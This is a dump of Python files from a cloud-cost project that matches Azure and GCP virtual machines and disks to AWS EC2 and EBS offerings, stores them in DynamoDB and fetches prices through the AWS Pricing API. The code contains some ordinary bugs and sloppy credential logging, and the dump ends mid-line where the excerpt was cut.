"Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "import time\nstart = time.time()\n\npotential_matches = [{'MemoryMB':2,'name':1},{'MemoryMB':2,'name':2},{'MemoryMB':3,'name':3},{'MemoryMB':10,'name':4},{'MemoryMB':1,'name':5},{'MemoryMB':5,'name':6}]\nvm = {}\nvm['MemoryMB'] = 1\nmatched_instances = []\n\n# we are going to find the 5 closest instances in memory\nfor i in range(0,5):\n # find the closest instance\n closest = min(potential_matches, key=lambda x:abs(x['MemoryMB']-vm['MemoryMB']))\n # add the instance to our final list\n matched_instances.append(closest)\n\n print(closest)\n \n # remove the closest from the potential matches so we can find the next closest\n potential_matches = [i for i in potential_matches if not (i['name'] == closest['name'])]\n\n# we now have a list of the five closest instances by memory\ntime.sleep(0.9)\nend = time.time()\nprint(\"Time consumed in working: \",end - start)" }, { "alpha_fraction": 0.5935798287391663, "alphanum_fraction": 0.5973058342933655, "avg_line_length": 33.50495147705078, "blob_id": "9b465fc15be1da02fc436771030ef75051978144", "content_id": "72dfd93dba5e48085c9b4237f05724f8be491951", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3489, "license_type": "no_license", "max_line_length": 128, "num_lines": 101, "path": "/testing+data/test.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "import boto3\nfrom boto3.dynamodb.conditions import Key\nfrom boto3.dynamodb.conditions import Attr\nimport time\nstart = time.time()\n\ndynamodb = boto3.resource('dynamodb', endpoint_url=\"https://dynamodb.us-east-1.amazonaws.com\")\n\ntable = dynamodb.Table('bluewhale_resources')\n\n# query for AWS vm\nAWS_vm= table.scan(\n # virtual machine from AWS which has the same type and more or equal vCPUs and similar ram capacity\n FilterExpression= Attr('resource type').eq('virtual machine') \n & Attr('provider').eq('AWS')\n)\n\ndef match_vm(vm,t):\n # get vm specs\n vCPUs = vm['vCPUs']\n memory = vm['MemoryMB']\n type = vm['virtual machine type']\n potential_matches = []\n matched_instances = []\n\n # filter potential matches\n for vm in AWS_vm['Items']:\n if vm['virtual machine type'] == type and 'vCPUs' == vCPUs and 'MemoryMB' >= int(float(memory) - (float(memory)*0.2)):\n potential_matches.append(vm)\n\n # edge case where AWS does not offer large enough instance in terms of vCPUs\n if not potential_matches:\n # if this is the case, we will return the largest possible instance\n # get all of the specified type\n data = t.scan(\n FilterExpression= Attr('resource type').eq('virtual machine') \n & Attr('provider').eq('AWS')\n & Attr('virtual machine type').eq(type) \n )\n if not data['Items']:\n return []\n # find the lowest number of vCPUs for potential match\n values = [x['vCPUs'] for x in data['Items']]\n max_vCPUs = max(values)\n\n # add all instances of this largest size to a list\n largest_matches = []\n for instance in data['Items']:\n if instance['vCPUs'] == max_vCPUs:\n largest_matches.append(instance['name'])\n \n return largest_matches\n \n # find the lowest number of vCPUs for potential match\n \n min_vCPUs = min(potential_matches, key=lambda x:x['vCPUs'] == vm['vCPUs'])\n\n # we now have the instances matched by vCPUs now we need to match by memory\n\n\n # we are going to try to find the 5 closest instances in memory\n for i in range(0,5):\n # while we still have options\n if min_vCPUs:\n # find the closest instance\n closest = min(min_vCPUs, key=lambda x:abs(x['MemoryMB']-vm['MemoryMB']))\n # add the instance to our final list\n matched_instances.append(closest['name'])\n \n # remove the closest from the potential matches so we can find the next closest\n potential_matches = [i for i in potential_matches if not (i['name'] == closest['name'])]\n \n # repeat 5x\n\n return matched_instances\n\nprint(\"Getting data...\")\n# get azure and gcp vm data\nthird_party_vm = table.scan(\n FilterExpression= Attr('resource type').eq('virtual machine') & (Attr('provider').eq('Azure') or Attr('provider').eq('GCP'))\n )\n\nprint(\"begin matching...\")\ncounter = 0\n# add in the AWS matches to each vm!\nfor vm in third_party_vm['Items']:\n counter = counter + 1\n print(str(counter) + ' ' + vm['name'])\n\n matches = match_vm(vm,table)\n table.update_item(\n Key={\n 'name': vm['name']\n },\n UpdateExpression=\"set AWS_matches=:a\",\n ExpressionAttributeValues={\n ':a': matches\n },\n ReturnValues=\"UPDATED_NEW\"\n )\nprint(\"done!\")\n\n\n\n\n" }, { "alpha_fraction": 0.5751320123672485, "alphanum_fraction": 0.5904944539070129, "avg_line_length": 36.85454559326172, "blob_id": "8748d7d2a863e1ae7456903d9898e5cc6b19ee32", "content_id": "dbfd873639a5fd65dc61d6b38990e9b028be4bb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2083, "license_type": "no_license", "max_line_length": 129, "num_lines": 55, "path": "/bluewhale_disk_match.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: Matches the 3rd party disk offerings with AWS matches\n# This code will need to be maintaned as the matches are done through a dict\n# we at first wanted to match based off IOPs but the way the different providers list or calculate IOPs differs a lot\n# so the disks are martched by use case\n\nimport json\nimport boto3\nfrom boto3.dynamodb.conditions import Attr\n\ndef lambda_handler(event, context):\n # there are only a few general categories of block storage available so we match the instances\n # with a hard coded dict--the GCP disks calculate IOPs in a very different way than AWS or Azure\n # so I went with a hard coded solution\n # because of this, this code will need to be maintained\n match_map = {\n 'pd-extreme' : ['io1', 'io2'],\n 'pd-ssd' : ['gp2', 'gp3'],\n 'pd-balanced' : ['gp2', 'gp3'],\n 'pd-standard' : ['st1', 'sc1'],\n 'Premium_LRS': ['io1', 'io2','gp2', 'gp3'],\n 'Premium_ZRS': ['io1', 'io2','gp2', 'gp3'],\n 'StandardSSD_LRS' : ['gp2', 'gp3'],\n 'StandardSSD_ZRS' : ['gp2', 'gp3'],\n 'Standard_LRS' : ['st1', 'sc1'],\n 'UltraSSD_LRS' : ['io1', 'io2']\n }\n \n \n dynamodb = boto3.resource('dynamodb', endpoint_url=\"https://dynamodb.us-east-1.amazonaws.com\")\n\n table = dynamodb.Table('bluewhale_resources')\n \n print(\"Getting data...\")\n # get azure and gcp disk data\n third_party_disk = table.scan(\n FilterExpression= Attr('resource type').eq('virtual disk') & (Attr('provider').eq('Azure') or Attr('provider').eq('GCP'))\n )\n # add the matches into the DB entries!\n for disk in third_party_disk['Items']:\n table.update_item(\n Key={\n 'name': disk['name']\n },\n UpdateExpression=\"set AWS_matches=:a\",\n ExpressionAttributeValues={\n ':a': match_map[disk['name']]\n },\n ReturnValues=\"UPDATED_NEW\"\n )\n print(\"done!\")\n return {\n 'statusCode': 200,\n 'body': json.dumps('Matching complete!')\n }\n\n" }, { "alpha_fraction": 0.5218985080718994, "alphanum_fraction": 0.5309666395187378, "avg_line_length": 36.550724029541016, "blob_id": "faa71b71a0eb233794af03064ffbf9c44541437c", "content_id": "82f1345fc9250176be02b31cd675f2d6818edac4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5183, "license_type": "no_license", "max_line_length": 157, "num_lines": 138, "path": "/bluewhale_calculate_cost.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: take in list of AWS resources and calculate the price per month for these resources\n# Inputs: list of dicts containing details about ec2 instances, list of dicts containing details about EBS resources\n# Output: the input dicts with the price per month added into the cost and the total cost per month of all instances\n\nimport json\nimport boto3\n\n\ndef get_ec2_cost(reg, ec2, os, quantity, pc, hours):\n # if this region, ec2 and os combo is not available this code might fail\n # so we will try + catch and return None if there is an issue\n try:\n paginator = pc.get_paginator('get_products')\n\n response_iterator = paginator.paginate(\n ServiceCode=\"AmazonEC2\",\n Filters=[\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'location',\n 'Value': reg\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'instanceType',\n 'Value': ec2\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'capacitystatus',\n 'Value': 'Used'\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'tenancy',\n 'Value': 'Shared'\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'preInstalledSw',\n 'Value': 'NA'\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'operatingSystem',\n 'Value': os\n }\n ],\n PaginationConfig={\n 'PageSize': 100\n }\n )\n\n products = []\n for response in response_iterator:\n for priceItem in response[\"PriceList\"]:\n priceItemJson = json.loads(priceItem)\n products.append(priceItemJson)\n \n # parse out the data we want\n sku = products[0]['product']['sku']\n on_demand_code = sku + '.' + 'JRTCKXETXF'\n price_per_hr_code = '6YS6EN2CT7'\n price_per_hour_usd = products[0]['terms']['OnDemand'][on_demand_code]['priceDimensions'][on_demand_code+'.'+price_per_hr_code]['pricePerUnit']['USD']\n \n \n\n return round(hours * float(price_per_hour_usd) * int(quantity), 2)\n except:\n return 0\n\ndef get_ebs_cost(region, ebs_type, ebs_name, quantity, size_GB, pc):\n\n response = pc.get_products(ServiceCode='AmazonEC2', Filters=[\n {'Type': 'TERM_MATCH', 'Field': 'volumeType', 'Value': ebs_type}, \n {'Type': 'TERM_MATCH', 'Field': 'location', 'Value': region}])\n \n products = []\n for priceItem in response[\"PriceList\"]:\n priceItemJson = json.loads(priceItem)\n products.append(priceItemJson)\n print(priceItemJson)\n \n # parse out the data we want\n price_per_hour_usd = 0 # to prevent return 'None'\n for ebs in products: # this goes through the ebse of type 'ebs_type' and selects the price\n sku = ebs['product']['sku']\n on_demand_code = sku + '.' + 'JRTCKXETXF'\n price_per_hr_code = '6YS6EN2CT7'\n if ebs_name == ebs['product'][\"attributes\"]['volumeApiName']:\n price_per_hour_usd = ebs['terms']['OnDemand'][on_demand_code]['priceDimensions'][on_demand_code+'.'+price_per_hr_code]['pricePerUnit']['USD']\n \n \n \n return round(float(price_per_hour_usd) * int(quantity) * int(size_GB), 2)\n\n\ndef lambda_handler(event, context):\n json_data = json.loads(event['body'])\n #json_data = event\n\n ec2 = json_data['ec2'] # dicts of {'name': name, 'region':region, 'os':os, 'quantity': quantity}\n ebs = json_data['ebs'] # dicts of {'name': name, 'region': region}\n total_cost_per_month = 0\n total_cost_per_month_EC2 = 0\n total_cost_per_month_EBS = 0\n pricing_client = boto3.client('pricing', region_name='us-east-1')\n\n # get cost info for all ec2 instances\n for e in ec2:\n # update individual price\n e['price per month USD'] = get_ec2_cost(e['region'], e['name'], e['os'], e['quantity'], pricing_client, 730)\n # update the total cost\n total_cost_per_month_EC2 += e['price per month USD']\n # get cost info for all ebs volumes\n for x in ebs:\n # update individual price\n x['price per month USD'] = get_ebs_cost(x['region'], x['type'], x['name'], x['quantity'], x['GB'], pricing_client)\n # update the total cost\n total_cost_per_month_EBS += x['price per month USD'] \n \n total_cost_per_month = total_cost_per_month_EBS + total_cost_per_month_EC2\n \n return {\n 'statusCode': 200,\n 'headers' : {\n 'Access-Control-Allow-Origin': '*',\n },\n 'body': json.dumps({\n 'compute costs' : ec2,\n 'storage costs' : ebs,\n 'total EC2 cost per month USD' : total_cost_per_month_EC2,\n 'total EBS cost per month USD' : total_cost_per_month_EBS,\n 'total cost per month USD' : total_cost_per_month\n\n })\n }\n\n" }, { "alpha_fraction": 0.6456953883171082, "alphanum_fraction": 0.6556291580200195, "avg_line_length": 36.875, "blob_id": "f83631ebb1c95617065d16951a508f48021636c3", "content_id": "e42632f85d1d9a6a84e40a091d1e3b11bc1dbc57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 302, "license_type": "no_license", "max_line_length": 144, "num_lines": 8, "path": "/gcp_refresh_resources/api_gateway_test.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "import requests\nimport json\n\ndata = requests.get('https://pz9xze9vsl.execute-api.us-east-1.amazonaws.com/prod/virtual-machines/list?provider=Azure&category=general purpose')\nj = json.loads(data.text)\nfor machine in j['Items']:\n print(machine['name'])\n print('...................................')" }, { "alpha_fraction": 0.594629168510437, "alphanum_fraction": 0.6035805344581604, "avg_line_length": 26.964284896850586, "blob_id": "e43ad7a3c2cc1e1c839398e91213b7c57b1cc45b", "content_id": "7994cd79ff1defd1fdce9fe2b2cc46133e8c0649", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 782, "license_type": "no_license", "max_line_length": 98, "num_lines": 28, "path": "/bluewhale_disk_provider_list.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: Lists the disk options given a provider\n\nimport json\nimport boto3\nfrom boto3.dynamodb.conditions import Attr\n\ndef lambda_handler(event, context):\n # parameters\n provider = event['queryStringParameters']['provider']\n dynamodb = boto3.resource('dynamodb', endpoint_url=\"https://dynamodb.us-east-1.amazonaws.com\")\n\n table = dynamodb.Table('bluewhale_resources')\n \n print(\"Getting data...\")\n # get disk data\n disks = table.scan(\n FilterExpression= Attr('resource type').eq('virtual disk') \n & Attr('provider').eq(provider)\n )\n\n return {\n 'statusCode': 200,\n 'headers' : {\n 'Access-Control-Allow-Origin': '*',\n },\n 'body': json.dumps(disks)\n }" }, { "alpha_fraction": 0.5368931889533997, "alphanum_fraction": 0.5368931889533997, "avg_line_length": 21.77777862548828, "blob_id": "a2b6aafcd7efbcaf9fd05052c8f7f34d656f39ed", "content_id": "495c85e992e106d81de0d342d6122a9b6ede3225", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1030, "license_type": "no_license", "max_line_length": 146, "num_lines": 45, "path": "/testing+data/parseAzureSKU.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "import json\n\n# parse list-sku azure api calls\n\nwith open('list-skus.json') as json_file:\n data = json.load(json_file)\n\nvm = []\ndisk = []\nfor j in data:\n if j['resourceType'] == 'virtualMachines':\n vm.append(\n j\n )\n elif j['resourceType'] == 'disks':\n disk.append(\n j\n )\n\n\nall_vm_specs = []\nfor v in vm:\n vm_specs = {}\n vm_specs['name'] = v['name']\n for c in v['capabilities']:\n if c['name'] == 'vCPUs' or c['name'] == 'MemoryGB' or c['name'] == 'vCPUsAvailable' or c['name'] == 'ACUs' or c['name'] == 'vCPUsPerCore':\n vm_specs[c['name']] = c['value']\n all_vm_specs.append(vm_specs)\n\nall_disk_specs = []\nfor d in disk:\n disk_specs = {}\n disk_specs['name'] = v['name']\n disk_specs['size'] = v['size']\n for c in d['capabilities']:\n disk_specs[c['name']] = c['value']\n all_disk_specs.append(disk_specs)\n\nfor dict in all_vm_specs:\n print(dict)\n print()\n\n#for dict in all_disk_specs:\n# print(dict)\n# print()\n \n" }, { "alpha_fraction": 0.5766052007675171, "alphanum_fraction": 0.5825386643409729, "avg_line_length": 33.19565200805664, "blob_id": "baade52a5e82588fa54dc6239e307f98e10e13de", "content_id": "71bdefd908d775445f338aca74d0815c741f1465", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4719, "license_type": "no_license", "max_line_length": 178, "num_lines": 138, "path": "/bluewhale_azure_refresh.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: This function calls an Azure API to retrieve specs about the different Azure VM & virtual disk offerings. \n# It categorizes and selects the desired specs for every returned instance and puts them into the DynamoDB\n# table 'bluewhale_resources'\n\nimport json\nimport requests\nimport adal\nimport boto3\nfrom decimal import Decimal\nimport os\n\n# timeout: 30 seconds (takes about 15)\n# memory: 512MB (uses about 251)\n\ndef lambda_handler(event, context):\n\n # info for azure authentification\n azure_client_id = os.environ['azure_client_id']\n azure_secret = os.environ['azure_secret']\n azure_subscription_id = os.environ['azure_subscription_id']\n azure_tenant = os.environ['azure_tenant']\n authority_url = 'https://login.microsoftonline.com/' + azure_tenant\n resource = 'https://management.azure.com/'\n \n # for API request\n context = adal.AuthenticationContext(authority_url)\n token = context.acquire_token_with_client_credentials(resource, azure_client_id, azure_secret)\n \n # API request header\n headers = {'Authorization': 'Bearer ' + token['accessToken'], 'Content-Type': 'application/json'}\n \n # API params and url\n params = {'api-version': '019-04-01'}\n url = 'https://management.azure.com/subscriptions/'+azure_subscription_id+'/providers/Microsoft.Compute/skus'\n \n \n print(\"calling API\")\n azure_SKUs_JSON = requests.get(url, headers=headers, params=params)\n print(\"API called!\")\n azure_SKUs_JSON = azure_SKUs_JSON.json()\n\n \n # now we have our Azure data\n # begin parsing\n \n vm = []\n disk = []\n for j in azure_SKUs_JSON['value']:\n # grab all VMs\n if j['resourceType'] == 'virtualMachines':\n vm.append(\n j\n )\n # grab all disks\n elif j['resourceType'] == 'disks':\n disk.append(\n j\n )\n \n # associates the first letter of a vm size with its (AWS equivalent) compute category\n vm_types = {\n 'D':'general purpose', 'A':'general purpose', 'B':'general purpose', \n 'F':'compute optimized','H':'compute optimized',\n 'E':'memory optimized', 'M':'memory optimized', 'G':'memory optimized',\n 'L':'storage optimized',\n 'N':'accelerated computing',\n 'P':'unknown edge case' \n }\n \n # parse out the specifications of the VMs\n all_vm_specs = []\n name_dict = {}\n for v in vm: \n vm_specs = {}\n vm_specs['name'] = v['name']\n vm_specs['virtual machine type'] = vm_types[v['size'][0]] # categorize the vm type based off above dictionary\n for c in v['capabilities']:\n if c['name'] == 'vCPUs' or c['name'] == 'MemoryGB' or c['name'] == 'ACUs' or c['name'] == 'vCPUsPerCore' or c['name'] == 'MaxResourceVolumeMB' or c['name'] == 'GPUs':\n \n if c['name'] == 'MemoryGB':\n vm_specs['MemoryMB'] = int(Decimal(c['value'])*1000) # convert to MB for better matching\n if c['name'] == 'vCPUs' or c['name'] == 'vCPUsPerCore':\n vm_specs[c['name']] = int(c['value'])\n else:\n vm_specs[c['name']] = c['value']\n name_dict[v['name']] = vm_specs\n\n \n\n\n # add in data columns\n for key,value in name_dict.items(): \n value['resource type'] = 'virtual machine'\n value['provider'] = 'Azure'\n all_vm_specs.append(value)\n \n \n # parse out the specifications of the disks\n name_dict.clear()\n all_disk_specs = []\n for d in disk:\n disk_specs = {}\n disk_specs['name'] = d['name']\n disk_specs['size'] = d['size']\n for c in d['capabilities']:\n disk_specs[c['name']] = c['value']\n name_dict[d['name']] = disk_specs\n \n for ky,val in name_dict.items():\n val['resource type'] = 'virtual disk'\n val['provider'] = 'Azure'\n all_disk_specs.append(val)\n\n # now we have the data we want!\n\n\n print('Number of VMs: ' + str(len(all_vm_specs)))\n print('Number of disks: ' + str(len(all_disk_specs)))\n\n\n print(\"Inputing VMs into DB...\")\n # put the data into the database\n azure_vm_table = boto3.resource('dynamodb').Table('bluewhale_resources')\n for item in all_vm_specs:\n azure_vm_table.put_item(Item=item)\n print(\"Done!\")\n \n print(\"Inputing disks into DB...\")\n azure_disk_table = boto3.resource('dynamodb').Table('bluewhale_resources')\n for item in all_disk_specs:\n azure_disk_table.put_item(Item=item)\n print(\"Done!\")\n \n return {\n 'statusCode': 200,\n 'body': json.dumps('Refresh complete!')\n }\n" }, { "alpha_fraction": 0.5076673030853271, "alphanum_fraction": 0.515566885471344, "avg_line_length": 32.31007766723633, "blob_id": "c851bbe8478b6596063d82f50321a8ae3eb0a151", "content_id": "734ea1bb943db6c3e109b35227ef29f91a5c939d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4304, "license_type": "no_license", "max_line_length": 157, "num_lines": 129, "path": "/bluewhale_get_vm_AWS_match.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Input: Third party vm name, AWS region name, operating system\n# Output: AWS EC2 match(s) with price in desired region\n# Purpose: On the front end the customer will select a vm from gcp or azure and the backend will need to \n# return the available EC2 matches as well as their price in the desired region\n# This code was heavily inspired by this blog: https://www.sentiatechblog.com/using-the-ec2-price-list-api\nimport json\nimport boto3\nfrom boto3.dynamodb.conditions import Key\n\ndef get_price_info(reg, ec2, os, pc):\n # if this region, ec2 and os combo is not available this code might fail\n # so we will try + catch and return None if there is an issue\n try:\n paginator = pc.get_paginator('get_products')\n\n response_iterator = paginator.paginate(\n ServiceCode=\"AmazonEC2\",\n Filters=[\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'location',\n 'Value': reg\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'instanceType',\n 'Value': ec2\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'capacitystatus',\n 'Value': 'Used'\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'tenancy',\n 'Value': 'Shared'\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'preInstalledSw',\n 'Value': 'NA'\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'operatingSystem',\n 'Value': os\n }\n ],\n PaginationConfig={\n 'PageSize': 100\n }\n )\n\n products = []\n for response in response_iterator:\n for priceItem in response[\"PriceList\"]:\n priceItemJson = json.loads(priceItem)\n products.append(priceItemJson)\n \n # parse out the data we want\n sku = products[0]['product']['sku']\n on_demand_code = sku + '.' + 'JRTCKXETXF'\n price_per_hr_code = '6YS6EN2CT7'\n price_per_hour_usd = products[0]['terms']['OnDemand'][on_demand_code]['priceDimensions'][on_demand_code+'.'+price_per_hr_code]['pricePerUnit']['USD']\n instance_meta_data = products[0]['product']['attributes']\n \n # build a dict of the data we want\n data = {\n 'name' : ec2,\n 'price per hour USD' : price_per_hour_usd,\n 'instance meta data' : instance_meta_data\n }\n\n return data\n except:\n return None\n\n\n\ndef lambda_handler(event, context):\n # parameters\n vm_name = event['queryStringParameters']['vm-to-match']\n region = event['queryStringParameters']['region']\n operating_system = event['queryStringParameters']['os']\n matches = []\n match_data = []\n\n dynamodb = boto3.resource('dynamodb', endpoint_url=\"https://dynamodb.us-east-1.amazonaws.com\")\n\n table = dynamodb.Table('bluewhale_resources')\n\n # query for potential matches\n data = table.query(\n # virtual machine from AWS which has the same type and more or equal vCPUs and similar ram capacity\n KeyConditionExpression= Key('name').eq(vm_name)\n )\n\n print(data['Items'][0])\n matches = data['Items'][0]['AWS_matches']\n\n pricing_client = boto3.client('pricing', region_name='us-east-1')\n\n\n \n\n for ec2 in matches:\n price_info = get_price_info(region, ec2, operating_system, pricing_client)\n if price_info != None:\n match_data.append(price_info)\n\n if not match_data:\n print(\"Region or OS not availiable for current selection\")\n return {\n 'statusCode': 500,\n 'headers' : {\n 'Access-Control-Allow-Origin': '*',\n },\n 'body': json.dumps(\"Invalid region + os selection\")\n }\n else:\n return {\n 'statusCode': 200,\n 'headers' : {\n 'Access-Control-Allow-Origin': '*',\n },\n 'body': json.dumps(match_data)\n }\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6315377354621887, "alphanum_fraction": 0.6358472108840942, "avg_line_length": 39.84000015258789, "blob_id": "6d4b0923de85376a3a4ac3d7757547b273cf11e0", "content_id": "7f612eae4f5cd438f16cecbe119a7a0aa15bd647", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5105, "license_type": "no_license", "max_line_length": 108, "num_lines": 125, "path": "/gcp_refresh_resources/bluewhale_gcp_refresh.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: Refresh the databse with GCP vm & Disk offerings\n\nimport json\nimport boto3\nimport os\nfrom googleapiclient import discovery\nfrom oauth2client.client import GoogleCredentials\nimport base64\nfrom botocore.exceptions import ClientError\n\n\ndef get_secret():\n secret_name = \"bluewhale_gcp_app_creds\"\n region_name = \"us-east-1\"\n\n # Create a Secrets Manager client\n session = boto3.session.Session()\n client = session.client(\n service_name='secretsmanager',\n region_name=region_name\n )\n\n # In this sample we only handle the specific exceptions for the 'GetSecretValue' API.\n # See https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html\n # We rethrow the exception by default.\n\n try:\n get_secret_value_response = client.get_secret_value(\n SecretId=secret_name\n )\n except ClientError as e:\n if e.response['Error']['Code'] == 'DecryptionFailureException':\n # Secrets Manager can't decrypt the protected secret text using the provided KMS key.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InternalServiceErrorException':\n # An error occurred on the server side.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InvalidParameterException':\n # You provided an invalid value for a parameter.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InvalidRequestException':\n # You provided a parameter value that is not valid for the current state of the resource.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'ResourceNotFoundException':\n # We can't find the resource that you asked for.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n else:\n # Decrypts secret using the associated KMS CMK.\n # Depending on whether the secret is a string or binary, one of these fields will be populated.\n if 'SecretString' in get_secret_value_response:\n secret = get_secret_value_response['SecretString']\n return secret\n else:\n decoded_binary_secret = base64.b64decode(get_secret_value_response['SecretBinary'])\n return decoded_binary_secret\n\nprint(get_secret())\nsecret = json.loads(get_secret())\n\nwith open('/tmp/cred.json', 'w') as json_file:\n json.dump(secret, json_file)\n\nos.environ['GOOGLE_APPLICATION_CREDENTIALS']='/tmp/cred.json'\n\ndef lambda_handler(event, context):\n # we want the information about the virtual machines that GCP offers\n # their API gives us info by GCP zone\n # to get all vm info we thus need to look through all zones\n zones = []\n credentials = GoogleCredentials.get_application_default()\n\n service = discovery.build('compute', 'v1', credentials=credentials)\n # Project ID for this request.\n project = 'learned-iris-320618'\n request = service.zones().list(project=project)\n while request is not None:\n response = request.execute()\n\n for zone in response['items']:\n # TODO: Change code below to process each `zone` resource:\n zones.append(zone['name'])\n\n request = service.zones().list_next(previous_request=request, previous_response=response)\n machines = {}\n\n # associates the first letter of a machine with its (AWS equivalent) compute category\n vm_types = {\n 'e':'general purpose', 'n':'general purpose', 'f':'general purpose', 'g':'general purpose',\n 'c':'compute optimized',\n 'm':'memory optimized',\n 'a':'accelerated computing' \n }\n\n\n # get machine for each zones\n for zone in zones:\n request = service.machineTypes().list(project=project, zone=zone)\n while request is not None:\n response = request.execute()\n # get each machines details\n for machine_type in response['items']:\n machines[machine_type['name']] = {\n 'name' : machine_type['name'],\n 'vCPUs' : machine_type['guestCpus'],\n 'MemoryMB' : machine_type['memoryMb'],\n 'virtual machine type' : vm_types[machine_type['name'][0]],\n 'provider': 'GCP',\n 'resource type': 'virtual machine'\n }\n request = service.machineTypes().list_next(previous_request=request, previous_response=response)\n # now we have a list of all the machines!\n resource_table = boto3.resource('dynamodb').Table('bluewhale_resources')\n # put machines into the DB\n for k in machines.keys():\n resource_table.put_item(Item=machines[k])\n return {\n 'statusCode': 200,\n 'body': json.dumps('Refresh complete!')\n }\n" }, { "alpha_fraction": 0.5962199568748474, "alphanum_fraction": 0.6048110127449036, "avg_line_length": 30.45945930480957, "blob_id": "a1716cf6f744433a72180afbff4e2fb03553bb18", "content_id": "c51942800f2b98bc989d34d36099d5c2b176e172", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1164, "license_type": "no_license", "max_line_length": 85, "num_lines": 37, "path": "/bluewhale_region_name_list.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: Returns region NAMES not CODES. We need these for pricing API call.\n# A region name: 'US East (Ohio)'. A region code: 'us-east-2'\n\nfrom inspect import Parameter\nimport json\nimport boto3\n\ndef lambda_handler(event, context):\n\n # List all regions codes\n data = boto3.client('ec2').describe_regions(AllRegions=True)\n region_codes = []\n for r in data['Regions']:\n region_codes.append(r['RegionName'])\n while \"NextToken\" in data:\n data = boto3.client('ec2').describe_regions()\n for r in data['Regions']:\n region_codes.append(r['RegionName'])\n \n \n # Get all region names using the region codes\n client = boto3.client('ssm')\n region_names = []\n for region in region_codes:\n response = client.get_parameter(\n Name='/aws/service/global-infrastructure/regions/' + region + '/longName'\n )\n region_names.append(response['Parameter']['Value']) \n print(region_names)\n return {\n 'statusCode': 200,\n 'headers' : {\n 'Access-Control-Allow-Origin': '*',\n },\n 'body': json.dumps(region_names)\n }\n" }, { "alpha_fraction": 0.5864537358283997, "alphanum_fraction": 0.607929527759552, "avg_line_length": 38.5, "blob_id": "fb45aca1ddf191a957382c2acdc9d977cfa1e51a", "content_id": "cdb401a14452c28cbf7e5b711eedea78327befe3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1816, "license_type": "no_license", "max_line_length": 109, "num_lines": 46, "path": "/testing+data/ebs_pricing.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "import boto3\nimport json\n\n# code modified from: https://medium.com/@stefanroman/calculate-price-of-ebs-volumes-with-python-76687bb24530\naws_region_map = {\n 'ca-central-1': 'Canada (Central)',\n 'ap-northeast-3': 'Asia Pacific (Osaka-Local)',\n 'us-east-1': 'US East (N. Virginia)',\n 'ap-northeast-2': 'Asia Pacific (Seoul)',\n 'us-gov-west-1': 'AWS GovCloud (US)',\n 'us-east-2': 'US East (Ohio)',\n 'ap-northeast-1': 'Asia Pacific (Tokyo)',\n 'ap-south-1': 'Asia Pacific (Mumbai)',\n 'ap-southeast-2': 'Asia Pacific (Sydney)',\n 'ap-southeast-1': 'Asia Pacific (Singapore)',\n 'sa-east-1': 'South America (Sao Paulo)',\n 'us-west-2': 'US West (Oregon)',\n 'eu-west-1': 'EU (Ireland)',\n 'eu-west-3': 'EU (Paris)',\n 'eu-west-2': 'EU (London)',\n 'us-west-1': 'US West (N. California)',\n 'eu-central-1': 'EU (Frankfurt)'\n }\nebs_name_map = {\n 'standard': 'Magnetic',\n 'gp2': 'General Purpose',\n 'io1': 'Provisioned IOPS',\n 'st1': 'Throughput Optimized HDD',\n 'sc1': 'Cold HDD'\n}\nregion = 'EU (Paris)'\n\npricing_auth = boto3.client('pricing', region_name=\"us-east-1\")\n\nfor ebs_code in ebs_name_map:\n response = 